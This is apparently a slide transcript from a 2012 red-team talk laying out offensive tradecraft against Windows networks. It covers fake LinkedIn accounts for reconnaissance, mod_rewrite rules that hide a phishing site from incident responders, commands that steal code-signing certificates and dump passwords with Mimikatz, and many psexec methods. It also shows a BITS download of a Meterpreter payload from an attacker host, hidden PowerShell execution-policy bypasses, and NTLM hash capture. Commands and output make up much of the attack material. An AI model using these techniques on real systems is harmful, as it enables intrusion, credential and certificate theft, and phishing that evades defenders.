  • 7. Becoming a LiON • Why? • API is based on YOUR connections • 2nd and 3rd level connections count but are give different access • Creating a fake account • Connecting with Recruiters ++ • Connecting with “Open Networkers”
  • 8. LinkedIn API • URL: https://developer.linkedin.com • Allows you to query information – Company info – Groups – Name about your 1st & 2nd order connections
  • 9. Big Ass LinkedIn Network • Meet “John” • John has been busy being awesome on LinkedIn for the last few months
  • 11. LinkedIn API • Limited by YOUR connections and network reach • API gives you NO info about 3rd order connections • Usually you’ll see more info via the web on 3rd order people • The total number of search results possible for any search will vary depending on the user's account level.
  • 12. LinkedIn API • An example (Palantir) CG vs. John
  • 13. LinkedIn API • An example (Pfizer) CG vs. John
  • 14. LinkedIn API • An example (Bank of America) CG vs. John
  • 15. More LinkedIn • Turning an email list into validated LinkedIn Contacts/emails • Import them!
  • 16. More LinkedIn • Get some emails
  • 17. More LinkedIn • Import them! • Need them in a specific format though. – Ruby to the rescue
  • 19. More LinkedIn • Get some contacts
  • 20. More LinkedIn • Import and do your thing
  • 21. The setup… IR teams F**k up all my hard work preparing phishing attacks
  • 22. Phishing and F**king with IR Teams • Thanks to people like SANS organizations have a standardized, repeatable, process  – What’s not to like? – Submit to the sandbox – Submit to the malware lookup site – I feel safe! • But, sure does suck when you spend all that time setting up a phish only to have it ruined by this well tuned, standardized process…
  • 23. Phishing and F**king with IR Teams • What you *could* do… – Build a phish that EVERYONE will report – Capture the IR process via log/scan/analyst activity • This gives you intel on: – Which services are contracted out for analysis • And their IPs – Are humans in the mix • And their IPs – Level of sophistication
  • 24. Phishing and F**king with IR Teams • Once you know who’s coming to do analysis, we can send them to an alternate site and keep the users going to the phish site. • How?
  • 25. Phishing and F**king with IR Teams • Apache and mod-rewrite is an option RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^$ [OR] RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(HTTrack|clshttp|archiver|load er|email|nikto|miner|python|wget|Wget).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww- perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR] RewriteCond %{REMOTE_ADDR} ^188.168.16.164$ [OR] #outside IR RewriteCond %{REMOTE_ADDR} ^66.249.73.136$ [OR] #googlebot RewriteCond %{REMOTE_ADDR} ^88.88. [OR] RewriteRule ^(/.*) http://www.totallysafesite.com/$1 [R,L]
  • 26. The setup… I want to find and steal code signing certificates from victims
  • 27. Stealing Certificates • Why? • Have you tried to get/buy one? It’s a pain in the ass. – I see why people just steal them • Impact – Sign code as the company – Now your code may be *more* trusted by the victim…or at least less suspicious – Can you steal their wildcard SSL cert?
  • 28. Stealing Certificates • If you export one, it has to have a password  • However, if YOU export it, YOU can set the password. • You can do this all on the command line – Use mozilla’s certutil • http://www.mozilla.org/projects/security/pki/nss/tools /certutil.html – Use Mimikatz 
  • 29. Stealing Certificates • Mozilla certutil • Compile your own, or download precompiled bins certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.def ault-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u <------- code signer Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip--
  • 30. Stealing Certificates • Mozilla certutil • -L List all the certificates, or display information about a named certificate, in a certificate database. certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.defaul t-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip • “u”  Certificate can be used for authentication or signing  • http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
  • 31. Stealing Certificates • Mozilla pk12util.exe • To extract the cert: C:UsersCGDownloadsnss-3.10nss-3.10bin>pk12util.exe - n "Verified Publisher LLC's COMODO CA Limited ID" -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdh wru.default-1339854577637 -o test2.p12 -W mypassword1 • http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
  • 32. Stealing Certificates Via MimiKatz (list certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit‘ Process 3472 created. Channel 12 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 mimikatz(commandline) # exit
  • 33. Stealing Certificates Via MimiKatz (export certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit' Process 6112 created. Channel 23 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK mimikatz(commandline) # exit
  • 34. The setup… Mimikatz is awesome and I want to execute it without putting bins on the box
  • 35. Mimikatz gives me clear text passwords?
  • 37. Mimikatz • Mimikatz detected by AV • Sekurlsa.dll detected by AV • WCE detected by AV • WCE IN MEMORY! (kinda) Stop submitting $#!+ to Virus Total!
  • 38. Mimikatz • New version (6 Sep 12) supports in-memory • execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
  • 39.
  • 40.
  • 41. The setup… Incognito is awesome and I want to show/leverage the new features
  • 42. New Incognito (find_token) C:>find_token.exe usage: find_token.exe <server_name_or_ip> | -f <server_list_file> [username] [password]
  • 43. New Incognito (find_token) C:>find_token.exe dc1 [*] Scanning for logged on users... Server Name Username ------------------------------------------------------ dc1 PROJECTMENTORjdoe dc1 PROJECTMENTORjdoe
  • 45. Release of NETVIEW C:Documents and SettingsuserDesktop>netview Netviewer Help -------------------------------------------------------------------- -d domain : Specifies a domain to pull a list of hosts from uses current domain if none specified -f filename.txt : Speficies a file to pull a list of hosts from -o filename.txt : Out to file instead of STDOUT
  • 46. Release of NETVIEW C:Documents and SettingsuserDesktop>netview -d [+] Host: WIN7X64 [*] -d used without domain specifed - using current domain [+] Number of hosts: 3 Enumerating AD Info [+] WIN7X64 - Comment - [+] Host: DC1 [+] WIN7X64 - OS Version - 6.1 Enumerating AD Info Enumerating IP Info [+] DC1 - Comment - [+] WIN7X64 - IPv4 Address - 172.16.10.216 [+] DC1 - OS Version - 6.1 [+] DC1 - Domain Controller Enumerating Share Info Enumerating IP Info [+] WIN7X64 - Share - ADMIN$ Remote Admin [+] DC1 - IPv4 Address - 172.16.10.10 [+] WIN7X64 - Share - C$ Default share [+] WIN7X64 - Share - IPC$ Remote IPC Enumerating Share Info [+] DC1 - Share - ADMIN$ Remote Admin [+] DC1 - Share - C$ Default share Enumerating Session Info [+] DC1 - Share - IPC$ Remote IPC [+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 [+] DC1 - Share - NETLOGON Logon server share [+] DC1 - Share - SYSVOL Logon server share Enumerating Logged-on Users Enumerating Session Info [+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 Enumerating Logged-on Users [+] DC1 - Logged-on - PROJECTMENTORjdoe [+] DC1 - Logged-on - PROJECTMENTORjdoe
  • 47. Release of NETVIEW AND IT’S ALREADY ON GITHUB:
  • 48. The setup… Dropping binaries is a necessity sometimes, persistence for instance, but unless you name your bin SVCHOST.exe you don’t want it looking like:
  • 49. this:
  • 51. He does something really well…
  • 52. And it’s not just the icon…
  • 53. Yes, it’s already on Github too
  • 54. The setup… Who doesn’t want more ways to psexec??!!!
  • 55. 10 ways to PSEXEC
  • 56. Sysinternal PSEXEC POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Leaves PSEXESVC • Executes binary as user running specified, not as • Have to touch disk if not SYSTEM, so no Proxy present already concerns
  • 57. Metasploit PSEXEC POSITIVES NEGATIVES • Supports the use of • Some AVs flag service Hashes binary due to injection techniques used within • Rundll32.exe is running
  • 58. Metasploit PSEXEC-MOF POSITIVES NEGATIVES • Drop a file and • XP and below Windows automatically – (only because Metasploit runs it. (MAGIC!) doesn’t automatically compile MOFs) • ADMIN$ required – (Unless you make code edits)
  • 59. Metasploit PSEXEC-As-User POSITIVES NEGATIVES • Executes as the current • Some AVs flag service user binary due to injection • No need for passwords techniques used within or hashes • Rundll32.exe is running • Also a great way to bypass UAC.. But more on that later
  • 60. WMI POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
  • 61. Powershell POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
  • 62. RemCom POSITIVES NEGATIVES • Open source psexec • Binary, so again, can’t • You can add Pass-The- go over Metasploit Hash sessions directly – (open source an all) – portfwd Fu can still be used on a single IP • Runs as SYSTEM
  • 63. Winexe POSITIVES NEGATIVES • Open source psexec • Binary, so again, can’t • Supports Pass-The-Hash go over Metasploit sessions directly – portfwd Fu can still be used on a single IP • Runs as SYSTEM
  • 64. smbexec POSITIVES NEGATIVES • Open source psexec • Binary • Supports Pass-The-Hash – (but designed with shoveling over Metasploit in mind) http://sourceforge.net/projects/smbexec/
  • 65. Pass the hash for 15 years stuff here • Firefox • smbclient • smbmount • Rpcclient • http://passing-the-hash.blogspot.com/
  • 66. Zfasel’s stuff here • If it ever gets released works ;-) LOVE YOU FASEL!! Go see his talk, it works now… maybe…
  • 67. Python && impacket • http://code.google.com/p/impacket/ • PTH support for SMB/MSSQL/
  • 68. WinRM (‘new’ hotness) POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
  • 69. Do you look for 5985 internally on your pen tests? we would suggest it ;-) src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
  • 70. Victim: winrm quickconfig –q Attacker: winrm quickconfig -q winrm set winrm/config/client @{AllowUnencrypted=“true”;TrustedHosts=“192.168.1.101”} Yes.. That’s right, THE ATTACKER says which hosts to trust… Sooooo much fun to be had! Oh, and did I mention it’s completely interactive? (You can enter password questions)
  • 71. Metasploit PSEXEC-WinRM POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns DISCLAIMER: CURRENTLY VAPORWARE!! but…
  • 72. Build your own pyBear • PySMB supports auth with using hashes • Thanks Rel1k for the heads up on the library – but I’m not a good enough coder to get it working • Compile your own psexec with hash support • ;-) • Impacket (again)
  • 73. Build your own Bear.rb • Metasploit’s Rex library – already has the hash passing goodness – HDM committed a stand-alone version of PSEXEC on September 5th 2012
  • 74. The setup… UAC sucks… bypassing only takes 2 things…
  • 75. The setup… If you’re an admin and UAC is stopping you…
  • 76. Find a network with more than one Windows box…
  • 77. The setup… Why doesn’t SYSTEM have proxy settings !?!
  • 78. • If OS !> Vista – SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit) • WINDOWS/EXEC (or any of the other psexec methods we just talked about) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM AUTOSCRIPT http://wpad/wpad.dat “;” (or PAC) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM /MANUAL_PROXY 192.168.5.100:3128 “;” – After your done use NO_PROXY in place of AUTOSCRIPT or MANUAL_PROXY • Then MSF-PSEXEC to your heart’s content, SYSTEM will now use the proxy you’ve set.
  • 79. NETSH & ProxyCFG • Sets the WinHTTP proxy – Not Windows’ proxy settings, only is used if the program uses WinHTTP • XP – proxycfg –p 192.168.92.100:3128 – or – proxycfg –u (pulls it from IE) • Vista+ – netsh winhttp set proxy 192.168.92.100:3128 – or – netsh winhttp import proxy ie
  • 80. REGISTRY Poking • HKLMSoftwarePoliciesMicrosoftWindows CurrentVersionInternet Settings • ProxySettingsPerUser [DWORD] • Set to 0 for settings are System Wide • Set to 1 for settgings are Per User
  • 81. The setup… Neat binaries that do backdoor/RAT behavior that are already there for us.
  • 82. Windows is my backdoor BITS “BITS is a file transfer service that provides a scriptable interface through Windows PowerShell. BITS transfers files asynchronously in the foreground or in the background. And, it automatically resumes file transfers after network disconnections and after a computer is restarted.” http://technet.microsoft.com/en-us/library/dd819415.aspx
  • 83. Windows is my backdoor BITS There are three types of BITS transfer jobs: - A download job downloads files to the client computer. - An upload job uploads a file to the server. - An upload-reply job uploads a file to the server and receives a reply file from the server application.
  • 84. Windows is my backdoor BITS (How-To) • Set the server side up (HTTP, not standard setup) – Google • Uses powershell to upload/download import BITS PS C:Userscg>Import-Module BitsTransfer Download files over BITS PS C:Userscg> Start-BitsTransfer http://192.168.26.128/upload/meterp443.exe C:UserscgDesktopmeterpdownload443.exe
  • 85. Windows is my backdoor BITS (How-To) Upload files over BITS PS C:Userscg> Start-BitsTransfer -Source C:UserscgDesktopfile2upload.txt -Destination http://192.168.26.128/upload/myfile.txt -transfertype upload
  • 86. Windows is my backdoor BITS over Wireshark
  • 87. Windows is my backdoor • Powershell • OMG Powershell!
  • 88. Windows is my backdoor • Powershell
  • 89. Windows is my backdoor • PowerShell – Does A LOT! – Check out Exploit Monday and PowerSploit – Carlos Perez has had lots of PowerShell blog posts – I haven't found a meterpreter feature that cant be done with PowerShell
  • 90. Windows is my backdoor • Powershell cool examples – Powershell hashdump (in SET) – Poweshell exec method in MSSQL_Payload – PowerSploit (syringe dll inject/shellcode exec ala PowerShell)
  • 91. Windows is my backdoor • Powershell cool examples • Port Scanner: PS C:> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.14",$_)) "$_ is open" } 2>$null 25 is open • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 92. Windows is my backdoor • Powershell cool examples • Port Sweeper PS C:> 1..255 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null 10.1.1.5 • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 93. Windows is my backdoor • Powershell cool examples • Bypass execution policy – Dave Kennedy talked about this at defcon 18 – Requires PowerShell v2.0 or above – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden - File "C:do_neat_ps_shit.ps1"
  • 94. Windows is my backdoor • CreateCMD stuff from Dave Kennedy • In SET • Pshexec by Carlos Perez • https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb • B64 encodes the command so you can pass via meterp or in another script • powershell -noexit –EncodedCommand [b64enc BLOB]
  • 95. Windows is my backdoor • Metasploit to generate PowerShell • Uses old powersploit technique
  • 96. Windows is my backdoor • How to run PowerShell from Meterpreter – Use a bat file C:>type run_ps.bat powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden -File C:ipinfo2.ps1 Example: meterpreter > execute -H -f cmd.exe -a '/c C:runps.bat' Process 28536 created. meterpreter > [*] 4.5.6.21:3863 Request received for /vLNL... [*] 4.5.6.21:3863 Staging connection for target /vLNL received... --snip-- [*] Patched Communication Timeout at offset 653608... [*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
  • 97. The setup… A webdav server to download files from. Why? Because we can.
  • 99. MSF WebDAV server • net use ipdocuments /User:Guest • copy ipdocumentsmyexe.exe myexe.exe • Available on github: • https://github.com/carnal0wnage/Metasploit- Code/blob/master/modules/exploits/webdav_file_server.rb
  • 100. MSF WebDAV server msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents [*] 192.168.26.1:17870 PROPFIND => 301 (/documents) [*] 192.168.26.1:17870 PROPFIND /documents/ [*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/) [*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory [*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
  • 101. The Setup… LAN based attacks are instant wins on internal pentests, but difficult if not impossible to do on externals… or are they…
  • 102. While we are on the subject… Does anyone know what happens when you try to access a share on a windows box that doesn’t exist from another windows box?? I want to access SHARE3 I don’t have SHARE3 Is that it?
  • 103. nope (if webclient service is started – Vista+ manual start) I want to access SHARE3 I don’t have SHARE3 on SMB I want to access SHARE3 over WebDAV If you are following along at home, windows is always (unless disabled) listening on Port 445 (SMB) so an attacker can’t override it, but rarely have anything listening on port 80
  • 104. On-target NBNS Spoofing FakeNetbiosNS FTW!
  • 105. Meet the Microsoft Windows Firewall “PORTPROXY” feature Basically it’s port-forwarding but can do so for: IPv4 -> IPv4 IPv6 -> IPv4 IPv6 -> IPv6 IPv4 -> IPv6 In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
  • 106. Now convince/cause someone to connect to a fake share on VICTIM1…
  • 107. weeeeeeeeeeeeee • *] 50.50.50.50 http_ntlm - Request '/share3/test.png'... • [*] 50.50.50.50 http_ntlm - 2012-01-10 04:22:25 +0000 • NTLMv2 Response Captured from WIN7X86 • DOMAIN: PROJECTMENTOR USER: jadmin • LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled • NTHASH:9eed2162b1c7424780204fb9ced5bc1a NT_CLIENT_CHALLENGE:0101000000000000067a01b4 b097cd01c77c09ccedbfc55d0000000002001a0070007 2006f006a006500630074006d0065006e0074006f0072 000000000000000000
  • 108. why 1. Give me SHARE3! 5. OK, you are in my Intranet, AUTHAUTH 4. AUTH! via portpoxy 3. AUTH! And yes, SMB_Relay works 7. kthxbai! just fine if you have a route set up over your 2. Portproxy! meterpreter shell of the 6. AUTOAUTH! connect back. Oh, did I mention cross-protocol means you can go to the same host?! ;-)
  • 109. Respectfully refrained from any Inside->Out Google images. You’re welcome.
  • 110. The setup… Are DNS Payloads useful? Let’s talk about our public options
  • 111. DNS Payloads • Quick talk on currently available DNS payloads • What’s available? – CANVAS DNS Mosdef – DNS Cat (skull security) – Metasploit DNS Payloads
  • 112. DNS Payloads • Canvas DNS Mosdef – Uses DNS TXT Records • So its UDP and correctly formed? – BUT • Directly connects to the host • Uses TXT records, – I’ve never pentested someone *good* that allowed this
  • 113. DNS Payloads • Canvas DNS Mosdef
  • 114. DNS Payloads • DNSCat (Skullsecurity) – http://www.skullsecurity.org/wiki/index.php/Dnscat – Uses recursive DNS requests • So its UDP and correctly formed? – Has a metasploit payload, so can make a msf dnscat binary to run and get shell – Same as dnscat –d domain –exec “cmd.exe” – BUT • But does recursive DNS requests • Never worked for me IRL
  • 115. DNS Payloads • DNSCat (Skullsecurity)
  • 116. DNS Payloads • DNSCat (java version) – http://tadek.pietraszek.org/projects/DNScat/ – Comes as java libs – Requires PPP to tunnel anything useful • *nix only?
  • 117. DNS Payloads • DNSCat (java version)
  • 118. DNS Payloads • Metasploit DNS – Currently there are no full DNS payloads • Aside from skullsecurity dnscat payload (not in trunk) – There are several payloads that will got fetch ANOTHER payload and exec it for you via DNS • dns_txt_query_exec.rb • dns_query_exec.rb • https://github.com/rapid7/metasploit- framework/pull/173 – Something in the works: http://dev.metasploit.com/redmine/issues/444#note-9
  • 119. DNS Payloads • Bottom Line – Nothing public that’s usable ATM

Editor's Notes

  1. Just talk the past work piece
  2. LinkedIN Open Networkers
  3. Phizer
  4. Phizer
  5. Maybe I don’t automate enough?
  6. You can play space invaders on it, how much else do you need!?
  7. And by a lot, I mean a lot …holy shit
  8. You can play space invaders on it, how much else do you need!?